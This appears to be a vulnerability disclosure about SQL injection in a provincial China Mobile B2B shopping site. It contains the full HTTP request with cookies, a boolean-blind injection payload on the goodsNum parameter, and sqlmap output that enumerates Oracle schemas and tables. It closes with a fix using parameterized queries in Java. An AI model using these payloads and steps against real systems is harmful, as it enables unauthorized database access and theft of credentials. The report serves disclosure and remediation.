A provincial website of China Mobile 10086.cn SQL injection involves a large amount of data.
SQL injection in the Jiangsu Mobile B2B Mall (Oracle database); sqlmap confirms and exploits it directly.
POST /b2b/actionDispatcher.do HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/b2b/goods/UUPO-U8.jsp
Content-Length: 88
Cookie: bi-user-id=141309163362895; WT_FPC=id=2e40e16cec67a0884481414484686765:lv=1448563543832:ss=1448563522116; tK1gTQFA2C=MDAwM2IyYThiNjAwMDAwMDAwNjQwQXgvWR0xNDQ4NTM1ODk0; B2B_JSESSIONID=qqrCWW2hTSZvSpZydDDTS1GBYbpr1GN1Sn0h9gT01GR1ndY1vjcB!382508210; __utma=231257732.265260302.1448563524.1448563524.1448563524.1; __utmb=231257**.**.**.**8563524; __utmc=231257732; __utmz=231257732.1448563524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; fpyUjfj0NP=MDAwM2IyYThiNjAwMDAwMDAwMzIwVC9ACVkxNDQ4NTM1OTEz
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

reqUrl=goodsDetailPrice&goodsNum=JSYD-LENOVO-A278T-01&supplierNum=99100012

The goodsNum parameter is injectable.
PoC:
goodsNum=JSYD-LENOVO-A278T-01') AND 1363=1363 AND ('1'='1
sqlmap identified the following injection point(s) with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: goodsNum
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: reqUrl=goodsDetailPrice&goodsNum=JSYD-LENOVO-A278T-01') AND 1517=1517 AND ('cknd'='cknd&supplierNum=99100012
---
[02:49:10] [INFO] the back-end DBMS is Oracle
Web application technology: Servlet 3.0, JSP 2.2, Nginx
Back-end DBMS: Oracle
[02:49:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[02:49:10] [INFO] fetching database (schema) names
[02:49:10] [INFO] fetching number of databases
[02:49:10] [INFO] resumed: 4
[02:49:10] [INFO] resumed: KFZXBTB
[02:49:10] [INFO] resumed: SYS
[02:49:10] [INFO] resumed: SYSTEM
[02:49:10] [INFO] resumed: TSMS1
Available databases [4]:
[*] KFZXBTB
[*] SYS
[*] SYSTEM
[*] TSMS1
The current database contains 659 tables, 8 of which have a password column.
Web application technology: Servlet 3.0, JSP 2.2, Nginx
Back-end DBMS: Oracle
[03:02:38] [INFO] fetching tables for database: 'kfzxbtb'
[03:02:38] [INFO] fetching number of tables for database 'kfzxbtb'
[03:02:38] [INFO] retrieved: 659
Solution:
Filter the input and use parameterized queries instead of concatenating request parameters into SQL.
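As an added illustration of that fix (not code from the affected site), the Java below shows the string concatenation that produces the boolean-based blind behaviour above next to a version that whitelists the parameter format and binds the values through PreparedStatement; the table and column names goods_price, goods_num, supplier_num and price are assumed.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.regex.Pattern;

public class GoodsPriceDao {

    // Before: the request parameter is spliced into the SQL text, so a value such as
    // JSYD-LENOVO-A278T-01') AND 1363=1363 AND ('1'='1 becomes part of the query
    // and the server's answer reveals whether the injected condition was true.
    static String vulnerablePrice(Connection conn, String goodsNum, String supplierNum)
            throws SQLException {
        String sql = "SELECT price FROM goods_price WHERE (goods_num = '" + goodsNum
                + "') AND (supplier_num = '" + supplierNum + "')";
        try (Statement st = conn.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            return rs.next() ? rs.getString(1) : null;
        }
    }

    // After: whitelist the product code and supplier number formats (assumed patterns),
    // then bind the values as placeholders so Oracle treats them as data, never as SQL.
    private static final Pattern GOODS_NUM = Pattern.compile("^[A-Z0-9-]{1,40}$");
    private static final Pattern SUPPLIER_NUM = Pattern.compile("^[0-9]{1,20}$");

    static String safePrice(Connection conn, String goodsNum, String supplierNum)
            throws SQLException {
        if (goodsNum == null || !GOODS_NUM.matcher(goodsNum).matches()
                || supplierNum == null || !SUPPLIER_NUM.matcher(supplierNum).matches()) {
            throw new IllegalArgumentException("invalid goodsNum or supplierNum");
        }
        String sql = "SELECT price FROM goods_price WHERE goods_num = ? AND supplier_num = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, goodsNum);    // bind variable: quotes and AND inside the value are inert
            ps.setString(2, supplierNum);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString(1) : null;
            }
        }
    }
}
```

The whitelist rejects the PoC value before any database call, and even without it the bind variables leave the query shape fixed.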